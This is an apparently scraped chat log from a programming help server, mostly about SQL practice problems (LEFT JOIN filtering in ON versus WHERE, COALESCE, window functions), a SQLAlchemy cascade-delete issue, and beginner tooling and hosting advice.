While this task only explores the basics of web application development with Backpack, it will allow you to tackle the process of creating applications with an eye for continuous integration
@ionic goblet Are you ready for a coding job if you don't know what a terminal is or an ide?
Its not acc a job dw lol, i litt just graduated hs
But i wanyed to try jt out
But ig ur right i shud learn first
I don't know react or javascript
But I can help you with the ide
I personally like visual studio code
Alr i shud download it right? Some resources i checkrd said i shud downlosd node.js and chocolatey?
Yep I never heard of chocolatey
I am a lil skeptical of downloading a lot of stuff cuz security and virusrs and all
I can link them
Ill try to download vs thank you
Then I would find a video how to run nodejs
Thank you!
Your welcome and again maybe google chocolatey
video
with vsc
by terminal they just mean this
There will be a place where you can use text below
Also this isn't a javascript/nodejs server
You would probably be better off in a server with javascript and nodejs
You might want to google a video on visual studio code interface I have to go
I need help creating a database. I know how to do the basics but want to hire someone who can create the table connects for foreign keys, select the proper data types, etc. what os the title for a person I can hire to do that?
Any beginner programmer can do that
Tbf, anyone can do anything with enough time. But sometimes the professionalism of paying someone else with more experience is better suited.
Unless I’m misunderstanding what you’re saying , if so my apologies.
Any Backend dev is obligated to be able doing it from Middle rank properly.
Or at least strong Junior should be able too
Before that I saw different examples of shit people do ^_^ during interviewing we have designing SQL tables as part of test. Some people even user database moved to in memory redis
Technically any graduate from CS degree is obligated to be able doing that. Technically. On practice as I mentioned different people are encountered
I am currently in a CS50 SQL course. But my little pet project seems like it is able to become business critical (which if they would've listened to me a year and a half ago, we wouldn't be in this situation and I would've had been taken the course instead of playing with flask and gui development, but thats another story)
I can advise which books to read if u wish learning this skill on your own
And I have I guess nice exercises to go for learning that
U really learn it when u design to handle high workload. And properly learned normalization preferably and letting SQL engine to do its job
I have some books, its mostly a time thing for me as i have a family of 5, learning c# for a personal project and now c++ and C for a community project.
Select your priorities better. Finding qualified devs is around 10000 euro effort (average cost for recruitment for some companies)
Easier to learn on your own if u can do dev stuff
Learning C++ in 2024 is a bit masochistic too heh
That too.
It wasn't my choice lol. Thats what the sdk uses.
Tbf, Ive been saying they needed to fix this for 18 months. But wasn't willing to move my personal interest around just to be ignored. My priority is C#.
C# is at least usable both for windows desktop and Linux backend today. Becomes more and more nicer supported ^_^.
Great dev satisfaction for its syntax.
A growing contender to re-challenge Java domination one day.
Still not trusting c# though
Its required for the sdk i need for the hardware for my personal project. But it seems verstile like python with dotnet so im going to be going full force into it as a second language before branching out further to some form of JS, maybe react or node.
😅 Js, react and node. The shame of modern world to make things dirty. Used by half of the world probably.
Dont know what you mean by that. My decision for Js is because of web apps lol. Although im sure django probably has a solution for that.
Programming world has ability for certain tradeoffs. By incurring more tech debt to write way more rapidly, at the cost of paying the price slightly later in bigger amount. And the incurred price can grow rather rapidly.
In JS world it is veeeery hard to escape paying this price.
I can admit that in a range of situation this world can offer less tech debt may be though
JS world traded off everything for speed at the cost of all quality
Gotcha. Im mostly looking at Js for things that need to update without refreshing the webpage. Kinda like how youtube views update every 30 or so seconds while youre watching the video.
For a good amount of usage cases u can do it without modern Js frameworks.
Check Htmx. It allows same too. U can use it with C#
Hi @calm grotto / @trim panther
regarding this qn: https://datalemur.com/questions/sql-ibm-db2-product-analytics
My solution is:
SELECT unique_queries, COUNT(employee_id) employee_count
FROM
(
SELECT e.employee_id employee_id, COALESCE(COUNT(DISTINCT q.query_id),0) unique_queries
FROM employees e
LEFT JOIN queries q
ON e.employee_id = q.employee_id
WHERE q.query_starttime >= '2023-07-01T00:00:00Z'
AND q.query_starttime < '2023-10-01T00:00:00Z'
GROUP BY(e.employee_id)
)AS sub_query
GROUP BY unique_queries
ORDER BY unique_queries
official solution in solution tab is:
WITH employee_queries AS (
SELECT
e.employee_id,
COALESCE(COUNT(DISTINCT q.query_id), 0) AS unique_queries
FROM employees AS e
LEFT JOIN queries AS q
ON e.employee_id = q.employee_id
AND q.query_starttime >= '2023-07-01T00:00:00Z'
AND q.query_starttime < '2023-10-01T00:00:00Z'
GROUP BY e.employee_id
)
SELECT
unique_queries,
COUNT(employee_id) AS employee_count
FROM employee_queries
GROUP BY unique_queries
ORDER BY unique_queries;
There is one row missing from the expected output which is shown below.
Output:
unique_queries employee_count
0 94
Not getting, what is the wrong that i did....
There's a small error where you filtered the queries table by their dates using a WHERE clause with your solution while in the official solution, they filtered the query queries table by their dates in the ON clause. The difference is that the join its using is a LEFT JOIN so even if the query table date is not in the date range of the join condition, it will still return a the row but with the query table data being null because the query table is the right side. This is why there's one extra row returned in the official solution because it returned the extra row that didn't fit the date range condition but still returned the LEFT side of the join.
Thank you..In my case also, i written LEFT JOIN only right? so, those employees who do not execute any query should also be part of my answer. isn't it?
I don't know what you're trying to solve but the official solution will return the employees who have no relation to the queries table resulting in more rows being returned.
In my solution, please see below 2 lines. I have written employees tables first & queries tables second. Beacuse of this reason, i will get those employees who do not have any relation with the queries table. right?
FROM employees e
LEFT JOIN queries q
Yes. In your case, an employee who does not have any relation to your queries table is an employee who didn't execute any queries.
so, this is the condition you were saying that, it got covered in official solution --> because of this, extra row came in official soltuion.
I also covered that, right?
Did you get the same result as the offical solution?
no, just trying to understand how is filter condition in ON clause is making difference when it in JOIN & when it isWHERE clause.
If a row from the queries table doesn't meet the date range condition and the condition is in the WHERE clause, the row won't be returned. But, if a row from the queries table doesn't meet the date range condition and the condition is in the ON clause of a LEFT JOIN, the row from the employees table will not join the queries table but the row will be returned with the queries table's column values being null because the employees table joined the table unsuccessfully.
If you used an INNER JOIN which means the employees table has to successfully join the queries table in order for the row to be returned, that ON clause would function like a WHERE clause.
The LEFT JOIN makes sure that at least one of every row of the table in the FROM clause is returned even if the row from the table has no relationship with the table it's joining.
It is helping me in understanding. Thanks for patiently typing detailed answer.
Just one small doubt...on this whole process, could you please explain the role played by COALESCE(COUNT(DISTINCT q.query_id),0)
It counts the distinct queries each employee has made and if that count is null, it returns the count as 0.
So, COALESCE = replace fn?
whenever it finds NULL in a column, it replaces it with the mentioned value(In my case, as i mentioned 0, it will replace NULL with 0).
where as replace fn can replace any value, but COALESCE fn is replacing only NULL value?
It replaces only null values.
ok, so below is right?
some_column
NULL
1
2
NULL
SELECT COALESCE(some_column,0)
some_column
0
1
2
0
yeah
I recommend testing out the functions out yourself.
AND q.query_starttime >= '2023-07-01T00:00:00Z'
AND q.query_starttime < '2023-10-01T00:00:00Z'
how can we know that the above 2 lines should go inside the ON clause, instead of where clause?
Now, we can tell these 2 lines should go inside the ON clause, with hindsight. but, when we reading the question. by reading what part of the question, we can understand that?
IBM is analyzing how their employees are utilizing the Db2 database by tracking the SQL queries executed by their employees. The objective is to generate data to populate a histogram that shows the number of unique queries run by employees during the third quarter of 2023 (July to September). Additionally, it should count the number of employees who did not run any queries during this period.
Display the number of unique queries as histogram categories, along with the count of employees who executed that number of unique queries.
You want the result to return all the distinct employee rows but the WHERE clause can filter out some of the distinct employees. It's hard to understand what to do I can admit. I guess if you're using a LEFT JOIN, let the conditions that involve columns from the table you're joining to (queries) stay in the ON clause.
It depends. You'll learn more by doing more problems.
rest everything you have explained, i understood, but only this part is confusing for me(i mean, you tried to explain best from your side, but i am not clear unfortunately)
if this question is asked to me in interview, tomorrow, i am not sure to keep this condition inside WHERE/ON.
anyway, thanks once again.
If you use an INNER JOIN, it doesn't matter where you use it because it won't return a row if there isn't a relationship between the two tables. Put the condition in the ON clause for a LEFT JOIN if you don't want that condition to determine if the left side of the row is returned or not.
this helps. I also recognised one more thing when looking at the tables.
suppose, lets consider same question but the query_starttime column is present inside the qeeries table instead of employees table --> then, query_starttime condition should be placed inside the WHERE clause, right?
isn't the query_starttime inside of the queries table?
right now, it is inside the queries table.
If your problem doesn't want you to return a employee who's query starttime is not in the range of the dates then you can put the date range condition in the WHERE clause.
Key phrase: doesn't want you to return a employee
this part of the question which is underlined by red colour says doesn't want you to return a employee who is not executed query in this period, right?
You should include the employees who didn't run any queries during that time period it says which basically means include the employees who have no relationship with the queries table.
The date range condition is another condition with joining the employees with the queries table.
??
- number of unique queries run by employees during the third quarter of 2023 (July to September).
- Additionally, it should count the number of employees who did not run any queries during this period.
Both these lines tell us to include employees ONLY FALLING IN THIS DATE RANGE...
It wants us to include employees who did not run any queries in the date range.
number 2
this is where exactly i get confused.
Additionally, it should count the number of employees who did not run any queries during this period. pls see the highligted word. it says during this period, means it is asking list of employees who did not executed any query during this period.
Yeah these problems can be confusing and miswritten. I think it's asking to include the list of employees who did not execute a query otherwise people will just return a list of employees who did execute a query. They basically want you to include the employees who made 0 queries.
yes. this line is some what misleading --> this is what totally confused me. By reading this line, i though like: so, it is always asking the employees who are in the mentioned date range. If the number 2 is like below, then it would be much more meaningful, you agree?
2. Additionally, it should count the number of employees who did not run any queries.
i removed during this period from the statement.
Yeah, I remember practicing some queries that a youtuber provided in an article and there was like no context at all. I ended up having to watch his video to watch him explain the extra context that wasn't provided in the problem. I assume it was his way of drawing viewers.
During this period is vital though because an employee could've executed a query outside of the time period.
I think it's asking for two steps: 1. for each employee, count number of unique queries they performed in Q3 2023. 2. From first result, display a histogram, where the grouping is by # of unique queries, and the value is the count(employee_id).
In other words, the histogram will show: 10 employees ran 0 queries, 15 employees ran 1 query, 5 employees ran 10 queries, and 1 employee ran 19 queries
This is fine... I am still getting confused only on one thing. how can we know below condition has to be inside the ON clause not on WHERE clause?
q.query_starttime >= '2023-07-01T00:00:00Z'
q.query_starttime < '2023-10-01T00:00:00Z'
First, you can use 'between'
Second; because you want to join on rows that meet that criteria.
what's wrong in doing this.
first, join without any condition & apply filter through WHERE clause --> then it gives me only those which are falling in this period.
Sure but the question requires an outer join, right?
LEFT OUTER JOIN. Yes.
Ofcourse i will use LEFT JOIN LIKE THIS:
FROM employees e
LEFT JOIN queries q
when i do this, all those employees who dont even run one query also gets covered(In the question, they asked to cover such employees too)
BUT DOING LIKE THIS IS WRONG.....When i do like this, in the output below row is getting missed. I am trying to understand the logic, where the wrong is happening....
unique_queries employee_count
0 94
What query are you saying is missing the output?
Not query...Below row is missing in output
unique_queries employee_count
0 94
Yes, what query are you running and what is its output?
SELECT unique_queries, COUNT(employee_id) employee_count
FROM
(
SELECT e.employee_id employee_id, COALESCE(COUNT(DISTINCT q.query_id),0) unique_queries
FROM employees e
LEFT JOIN queries q
ON e.employee_id = q.employee_id
WHERE q.query_starttime >= '2023-07-01T00:00:00Z'
AND q.query_starttime < '2023-10-01T00:00:00Z'
GROUP BY(e.employee_id)
)AS sub_query
GROUP BY unique_queries
ORDER BY unique_queries
From this output, below row is missing:
unique_queries employee_count
0 94
The actual query which is present inside the solution tab is:
WITH employee_queries AS (
SELECT
e.employee_id,
COALESCE(COUNT(DISTINCT q.query_id), 0) AS unique_queries
FROM employees AS e
LEFT JOIN queries AS q
ON e.employee_id = q.employee_id
AND q.query_starttime >= '2023-07-01T00:00:00Z'
AND q.query_starttime < '2023-10-01T00:00:00Z'
GROUP BY e.employee_id
)
SELECT
unique_queries,
COUNT(employee_id) AS employee_count
FROM employee_queries
GROUP BY unique_queries
ORDER BY unique_queries;
and the output is:
Move the date comparison into the 'on'
As a where, it's applied after the join. For an inner join, it doesn't matter. For an outer, it does
when i do this, all those employees who dont even run one query also gets covered
FROM employees e
LEFT JOIN queries q
then we can apply filter through WHERE clause right?
If you apply a filter on q in the where clause, you'll exclude any employees with no q
sorry. not getting, any way, pls leave. its wasting your time.
by the way: any idea why the below query is giving all ctr's as 0?
SELECT app_id "app_id",
(
SUM(
CASE
WHEN event_type = 'clicks'
THEN 1
ELSE 0
END
)/
SUM
(
CASE
WHEN event_type = 'impression'
THEN 1
ELSE 0
END
)
)*100 AS ctr
FROM events
WHERE timestamp >= '2022-01-01'
AND timestamp < '2023-01-01'
GROUP BY(app_id)
the question i am solving is: https://datalemur.com/questions/click-through-rate
Let me try explaining differently: 'select * from a left join b on ...' returns a's and each of their b's, plus a's with no b
Right?
Right & in place of columns from b, we will get NULL
Yes, and what happens when I filter that result where b.date > somedate?
Specifically: What happens when b.date is null?
Alternatively: what is 'null > somedate'
Because you have a typo. Check your event types.
May be how about proceeding with below example data...
employees
employee_id full_name gender
1 Judas Beardon Male
2 Lainey Franciotti Female
queries
employee_id query_id query_starttime execution_time
226 856987 07/01/2023 01:04:43 2698
132 286115 07/01/2023 03:25:12 2705
221 33683 07/01/2023 04:34:38 91
240 17745 07/01/2023 14:33:47 2093
110 413477 07/02/2023 10:55:14 470
As per your first qn, When below query is executed on above data:
SELECT e.employee_id, e.full_name, q.query_id
FROM employees e
LEFT JOIN queries q
ON e.employee_id = q.employee_id
Output is:
employee_id full_name query_id
1 Judas Beardon NULL
2 Lainey Franciotti NULL
What are you asking?
no, you told that, will proceed in different way & started asking qn's to me, right...
I was explaining why your condition in the where clause will remove null values.
could you pls explain with respective to above sample data, it is easy for me to grasp with sample data
I'm not sure I can explain it any differently. When q is null for an employee, the 'where q.query_starttime >=' is checking if null >= some date. This is false, therefore the row gets excluded
any idea why the below query is giving all ctr's as 0?
SELECT app_id "app_id",
(
SUM(
CASE
WHEN event_type = 'clicks'
THEN 1
ELSE 0
END
)/
SUM
(
CASE
WHEN event_type = 'impression'
THEN 1
ELSE 0
END
)
)*100 AS ctr
FROM events
WHERE timestamp >= '2022-01-01'
AND timestamp < '2023-01-01'
GROUP BY(app_id)
question is: https://datalemur.com/questions/click-through-rate
I explained here #databases message
You need to practice debugging the queries by writing simple queries first, and then combining the logic. Otherwise small errors creep in
are u saying about type click?
i changed from clicks to click, yet ctr is 0
SELECT app_id "app_id",
(
SUM(
CASE
WHEN event_type = 'click'
THEN 1
ELSE 0
END
)/
SUM
(
CASE
WHEN event_type = 'impression'
THEN 1
ELSE 0
END
)
)*100 AS ctr
FROM events
WHERE timestamp >= '2022-01-01'
AND timestamp < '2023-01-01'
GROUP BY(app_id)
Change your division / to a comma
?
What I'm saying is: compute the sums separately first, and inspect the results, before combining them into a formula.
Check the sum of clicks, and impressions, before combining them into a formula
(
SUM(
CASE
WHEN event_type = 'click'
THEN 1
ELSE 0
END
)/
SUM
(
CASE
WHEN event_type = 'impression'
THEN 1
ELSE 0
END
)
)*100 AS ctr
I am trying to install mysql on the aws ec2 computer, log in to my mysql account, and create a mysql database in it, then in django connect to that database. why is my sql download red?
That's just the color your shell uses for that file type
Cool, I am now trying to set up the database using AWS RDS, but it costs $750 a month to do this? Is there a free (er) version?
Jesus. I run my ~6 hobby projects on a single Linode box for $5/month with Dokku. That seems more reasonable. I run my work project off of a single linode VPS too, although that one is a bit bigger naturally.
is using RDS for MySQL ideal for deploying DJango projects on a AWS EC2 server or are there better options?
Related to https://datalemur.com/questions/sql-highest-grossing
SELECT category, product, sum total_spend,
ROW_NUMBER() OVER(
PARTITION BY category, product ORDER BY sum DESC
)
FROM
(
SELECT category, product, SUM(spend) sum
FROM product_spend
WHERE EXTRACT(year FROM transaction_date) = '2022'
GROUP BY category, product
ORDER BY sum DESC
) AS sub_query
Pls look at the 3rd line(PARTITION BY). There i mentioned ORDER BY sum DESC, whcih means, data should be sorted based on sum column from highest to lowest, right? but, still i see the other way!
Personally I wouldn't use AWS. Over priced, enormously complicated. My company gets billed for stuff I can't figure out how to stop.
Hey I was designing tables diagrams for DB and I included images with them but when I show them to professional he said u can’t include pictures in db what the reason and where should I do?
I’m not really familiar with database buildings
Can't is a bit of a strong word. You can. But normally you store files in some other way and just have references to them in the db. S3 or compatible object store is very common.
Can you explain where can I store them
Google the concepts I mentioned
When cleaning up my tests aka deleting the users in the table I get this error: sqlalchemy.exc.PendingRollbackError: This Session's transaction has been rolled back due to a previous exception during flush. To begin a new transaction with this Session, first issue Session.rollback(). Original exception was: (sqlalchemy.dialects.postgresql.asyncpg.IntegrityError) <class 'asyncpg.exceptions.NotNullViolationError'>: null value in column "receiver" of relation "dms" violates not-null constraint E DETAIL: Failing row contains (1, current_user, null). E [SQL: UPDATE dms SET receiver=$1::VARCHAR WHERE dms.id = $2::INTEGER] E [parameters: (None, 1)] E (Background on this error at: https://sqlalche.me/e/20/gkpj) (Background on this error at: https://sqlalche.me/e/20/7s2a)
The dm is dependent on the users but I set the dm foreign key constraints to ON DELETE CASCADE so I don't know why sqlalchemy or postgres is running an update statement.
You think GCP is a good option or do you recommend something else?
I do not. Start small and simple. A single vps. Maybe with dokku.
Ok, how should I go about incrementing what I can do? Is there some sort of VPS tier list or perhaps skills needed list?
I get the feeling you don't know what any of these words mean.
first, bad practice to use keywords like "sum" as field names. I'm not even sure if it's valid (depends on the DB). But, you say: "I see the other way": this is because row_number increments upwards, I think.
See https://dbfiddle.uk/yi6XVcCD as an example
| random_val | rownum |
|---|---|
| 0.8538484053414539 | 1 |
| 0.6927891748763448 | 2 |
| 0.6917615722683808 | 3 |
| 0.26217551941058415 | 4 |
| 0.21703132645233025 | 5 |
| 0.1463849017910941 | 6 |
SELECT 6
You should work on figuring out how to debug these problems. Simplify and isolate the question. My example above isolates your row_number question to a minimum example.
I found the weirdest bug in postgres/sqlalchemy where when it deletes a row in my Users table, it just updates Dms table's foreign key that references the Users table to null even though I explicitly set the on delete to CASCADE. It even shows that in the foreign key constraint info when I look up the table's configurations.
SELECT
category,
product,
total_spend
WHERE
ROW_NUMBER() OVER(
PARTITION BY category
) <= 2
FROM
(
SELECT
category,
product,
SUM(spend) AS total_spend
FROM product_spend
WHERE EXTRACT(year FROM transaction_date) = '2022'
GROUP BY category, product
ORDER BY category, total_spend DESC
)AS sub_query
Error
syntax error at or near "FROM" (LINE: 9)
I am executing query here: https://datalemur.com/questions/sql-highest-grossing
Simplify your query. Replace the subquery with something like 'select 1 as category, 3 as product, 4 as total_spend'
You'll see you have a syntax error
guys I'm using sqlalchemy v2 and I'm trying to load relationships from the database but the problem occurs is that
it's taking a lot of time (10s) to process the data which is making my api slow.
<@&831776746206265384>
!pban 632845771640799232 job ad spam
:x: User is already permanently banned (#97864).
How are you loading them? Could I see the code?
Hey all!
A bit of an unusual request, but I'm looking for personal experiences & stories relating to working with SQL databases. It could be a schema migration task that took longer than expected, ORM configuration, or maybe something else entirely. Funny, positive, negative - anything really.
It's for an educational presentation and I'm trying to bring some storytelling into it, but it's harder than expected. 
I found the weirdest bug in postgres/sqlalchemy where when it deletes a row in my Users table, it just updates Dms table's foreign key that references the Users table to null even though I explicitly set the on delete to CASCADE. It even shows that in the foreign key constraint info when I look up the table's configurations.
Lool why 🫠 thank you for the video too! Did you figure it out in the end??
Nope. I'm still wondering what the problem is. The thing is that error was not straightforward either. I had to dig into my code for awhile.
The most annoying type of bugs honestly - lucky you actually noticed it, feels like a quite simple op that should just work 🫠
I highly doubt you have found such a bug in postgres. Did you check that it's cascade in the db?
I checked the cascade. It says ON DELETE CASCADE.
Well, then I would check what sqlalchemy is doing
It's definitly a sqlalchemy problem. Maybe I should check the source code?
I'm doing a unit test and at the end of the test, it deletes the test users which the dm row references. Then, it runs an update statement on the dms row setting the foreign key that references the user being deleted to null.
I would check what commands are sent
you mean the reverse? sets to null first, then deletes?
It updates the dm foreign keys to null before deleting the users.
yea, that makes more sense
https://www.geeksforgeeks.org/window-functions-in-sql/
Why does ORDER BY in the window function do this? It makes no sense. Is there a good explanation for why this happens?
Here we also order the records within the partition as per age values and hence the average values change as per the sorted order.
I don't get what it's trying to say.
sorry... not getting what you are saying...
I think that: You are getting stuck trying to understand the entire query at once. Break your problems down to smaller pieces (queries).
SELECT coulmn_name1,
window_function(cloumn_name2)
OVER([PARTITION BY column_name1] [ORDER BY column_name3]) AS new_column
FROM table_name;
Let's give a real example:
It seems to be working for some reason now.
SELECT age,
row_number() over (partition by age order by height) as height_rank_by_age
FROM people;
The "order by" means: I want to apply the row_number in height order, within each age group. This is important when the aggregate function requires ordering. If it's something like "avg", the order doesn't matter, of course (except that adding an order means that the aggregate is applied to previous values).
But it says it makes the averages wrong.
I don't get why it would do that. With AVG, I don't get why it would change anything except what order the rows are listed in.
I would assume you were confused about some details. It's almost always a good idea to trust the computer and accept that your own monkey brain is easily fooled.
Idk I didn't do anything and then came back the next day and it works.
I think it's safe to say that you did in fact change something, you just don't remember it because your brain thought it unimportant. Brains do that all the time.
row_number... of.. height? I don't understand how that makes sense
You're probably right. A change in the smallest details can make a huge impact.
It's the rank of height... shortest to tallest.
hmm.. ok. I can't wrap my brain around that thing you wrote. It seems overly complex to me.
Actually it's still doing the same thing setting the null values of the Dms foreign keys that reference the Users table instead of deleting them. I just forgot to set the Dms foreign keys back to nullable=False.
So you were right
It's a pretty normal use of a window function. Here's a more typical finance example:
SELECT ticker,
industry,
return_1y,
row_number() over (partition by industry order by return_1y desc) return_by_industry_rank
FROM
return_summary
For each ticker, this tells me which companies had the best return within their industry.
Oh, also, my example had a typo... it should've been "row_number()", not "row_number(height)"
I don't get why using ORDER BY changes the result of the aggregate function on their example where they use AVG.
One sec, I'll cook up an example
Ok, so here's the confusing stuff: partition by itself = the aggregate is applied to population. order by the aggregate is applied to rows preceding and including the current row, rows between (framing) allows you to fine tune which rows are included.
So for finance, first row is average of 50000, second is average of 50000 and 50000, third is average of 50000, 50000, and 20000. Then for sales, first row is average of 30000, second row is average of 30000 and 20000. And also it makes the rows get listed in age order per partition.
| s | sum | sum | sum | sum |
|---|---|---|---|---|
| 1 | 55 | 1 | 55 | 1 |
| 2 | 55 | 3 | 54 | 3 |
| 3 | 55 | 6 | 52 | 6 |
| 4 | 55 | 10 | 49 | 9 |
| 5 | 55 | 15 | 45 | 12 |
| 6 | 55 | 21 | 40 | 15 |
| 7 | 55 | 28 | 34 | 18 |
| 8 | 55 | 36 | 27 | 21 |
| 9 | 55 | 45 | 19 | 24 |
| 10 | 55 | 55 | 10 | 27 |
SELECT 10
See example above.
Yes.. well, except the "rows get listed in age order", no... the order of the result is non-deterministic here